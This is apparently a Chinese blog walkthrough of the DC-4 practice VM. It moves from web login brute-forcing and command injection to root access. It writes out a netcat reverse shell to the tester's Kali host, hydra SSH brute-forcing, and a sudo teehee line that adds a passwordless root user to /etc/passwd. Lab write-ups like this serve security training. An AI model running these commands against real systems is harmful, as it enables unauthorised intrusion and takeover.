靶机DC-4

Posted 2021-08-28 Jach1n

靶机DC-4

靶机下载地址：https://www.five86.com/dc-4.html

扫描靶机所在网段，发现靶机为.133
探测靶机端口服务等

靶机开放80 22端口 访问下网站，需要用户名密码

爆破下密码，用户名应该就是admin/Admin 打开burp，随便输个密码，抓包

可以将kali中/usr/share/wordlists下的rockyou.txt文件导入进行暴破 由于这个字典有点大，导入burp太慢，而且跑起来时间太长，导出前1000条跑吧

head -1000 rockyou.txt > admin.txt

这里我换到物理机上的burp跑了稍微快点 Admin没跑出来，用户名换成admin即可

登录后发现可以执行命令

使用burp改包，cat+/etc/passwd，确认可以执行命令

为了方便操作，弹个shell到kali上

nc+192.168.32.128+666+-e+/bin/bash
nc -lvp 666

在jim目录下找到old-password.bak文件 将内容复制出来，创建为jim.txt

暴破下ssh，账户名为jim，密码使用jim.txt 然后使用jim登录ssh

hydra -l jim -P jim.txt ssh://192.168.32.133:22

ssh 192.168.32.133 -l jim
pwd=jibril04

看了下也没root权限的命令

注意下ssh登录提示，you have mail 查看下邮件，charles发来的邮件，里面告诉了密码：^xHhA&hvim0y，直接登录即可

发现这个账户teehee命令有root权限且不需要密码执行，可以用来提权

teehee提权 可以通过passwd文件的格式来分析 uid gid 都为0 用/bin/bash来执行，相当于创建了个root权限的用户

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
test::0:0:::/bin/bash

获取root权限后，在root目录下找到本次的flag